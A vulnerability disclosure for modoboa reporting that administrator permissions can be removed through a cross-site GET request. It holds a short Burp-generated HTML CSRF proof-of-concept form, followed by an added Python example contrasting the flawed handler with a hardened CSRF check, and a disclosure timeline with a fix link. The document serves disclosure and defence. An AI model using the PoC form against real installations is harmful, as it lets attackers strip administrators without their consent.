CSRF leading to remove Administrators users in modoboa/modoboa
Status: Valid
Reported on: Jan 21st 2023
Description
The permission remove function is vulnerable to CSRF: a cross-site request to GET /admin/permissions/remove/?domid=2&daid=15 removes any administrator user, because the action is performed on a GET request with no CSRF token.
Proof of Concept
1/ Visit /admin/domains/1/
2/ The delete button that removes a permission is vulnerable to CSRF (video):
https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing
3/ Visit the PoC page below; changing the domid/daid values removes the corresponding administrator user.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- The form has no method attribute, so it submits as GET with no CSRF token;
     the victim's browser attaches the session cookie and the removal succeeds. -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://127.0.0.1/admin/permissions/remove/">
<input type="hidden" name="domid" value="2" />
<input type="hidden" name="daid" value="15" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference
The same effect can be caused by deleting the administrative username, as in these earlier reports:
https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/
https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/
Impact
Allows an attacker to induce an authenticated administrator to perform an action they did not intend (removal of an administrator user) simply by visiting a page the attacker controls.
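The following is an added example for this page, not modoboa's own code (modoboa is a Django application, and Django's CsrfViewMiddleware together with a POST-only view provides the equivalent protection). It contrasts the shape of the reported flaw, a GET request that removes an administrator, with a hardened handler that refuses non-POST requests, checks the Origin/Referer against the site's own host, and verifies a double-submit CSRF token. The Request class, the ALLOWED_ORIGINS host, the permission set and the replayed PoC request are all constructed for the example.

```python
"""
CSRF guard for a state-changing admin action, beside the GET-based removal
described in the report. Added example; not modoboa's code. All request
data below is constructed.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Deployment host the application considers its own (constructed value).
ALLOWED_ORIGINS = {"https://mail.example.test"}


@dataclass
class Request:
    """Minimal stand-in for a framework request object (hypothetical)."""
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)
    cookies: dict[str, str] = field(default_factory=dict)
    form: dict[str, str] = field(default_factory=dict)
    query: dict[str, str] = field(default_factory=dict)


def issue_csrf_token() -> str:
    """Per-session random token; set as a cookie and embedded in forms."""
    return secrets.token_urlsafe(32)


def csrf_check(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason) for a state-changing request."""
    # 1. Safe methods must never change state: a cross-site <form> or <img>
    #    can fire a GET with the victim's cookies and no user intent.
    if req.method != "POST":
        return False, f"state change via {req.method} refused"
    # 2. The browser-supplied Origin (or Referer) must be our own site.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" not in ALLOWED_ORIGINS:
        return False, f"cross-site request from {parts.netloc}"
    # 3. Double-submit token: the form value must equal the cookie value.
    cookie_token = req.cookies.get("csrftoken", "")
    form_token = req.form.get("csrfmiddlewaretoken", "")
    if not cookie_token or not hmac.compare_digest(cookie_token, form_token):
        return False, "csrf token mismatch"
    return True, "ok"


def remove_permission_vulnerable(req: Request, perms: set) -> tuple[bool, str]:
    """Shape of the reported flaw: a GET with domid/daid removes the admin."""
    perms.discard((req.query.get("domid"), req.query.get("daid")))
    return True, "removed"


def remove_permission_hardened(req: Request, perms: set) -> tuple[bool, str]:
    """Same action behind the CSRF guard; parameters come from the POST body."""
    allowed, reason = csrf_check(req)
    if not allowed:
        return False, reason
    perms.discard((req.form.get("domid"), req.form.get("daid")))
    return True, "removed"


def demo() -> dict[str, object]:
    """Replay a request shaped like the report's PoC against both handlers."""
    # Cross-site request as a GET form submission would produce: attacker
    # Referer, victim's cookies, no token (constructed).
    poc = Request(
        method="GET", path="/admin/permissions/remove/",
        headers={"Referer": "https://attacker.example/poc.html"},
        cookies={"sessionid": "victim-session", "csrftoken": "abc"},
        query={"domid": "2", "daid": "15"},
    )
    vuln_perms = {("2", "15"), ("1", "3")}
    hard_perms = {("2", "15"), ("1", "3")}
    poc_vs_vulnerable = remove_permission_vulnerable(poc, vuln_perms)
    poc_vs_hardened = remove_permission_hardened(poc, hard_perms)
    admin_kept = ("2", "15") in hard_perms

    # Legitimate same-site POST carrying the session's token (constructed).
    token = issue_csrf_token()
    legit = Request(
        method="POST", path="/admin/permissions/remove/",
        headers={"Origin": "https://mail.example.test"},
        cookies={"sessionid": "admin-session", "csrftoken": token},
        form={"domid": "2", "daid": "15", "csrfmiddlewaretoken": token},
    )
    legit_post = remove_permission_hardened(legit, hard_perms)
    return {
        "poc_vs_vulnerable": poc_vs_vulnerable,
        "admin_removed_by_poc": ("2", "15") not in vuln_perms,
        "poc_vs_hardened": poc_vs_hardened,
        "admin_kept_by_hardened": admin_kept,
        "legit_post": legit_post,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The three checks are layered on purpose: the POST requirement alone stops the form in this report, the origin check stops a cross-site POST from a page that cannot read the token, and the token comparison covers deployments where Origin/Referer is stripped. Refusing at the first failed check also gives the application a concrete reason to log, which is the signal a defender wants when hunting for CSRF attempts against admin endpoints.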
Occurrences
We are processing your report and will contact the modoboa team within 24 hours.
4 months ago: 0ozero0 modified the report
4 months ago: 0ozero0 modified the report
4 months ago: We have contacted a member of the modoboa team and are waiting to hear back
4 months ago: The researcher's credibility has increased: +7
Here is a fix: https://github.com/modoboa/modoboa/pull/2758
The fix bounty has been dropped
This vulnerability has been assigned a CVE
domain.py#L2 has been validated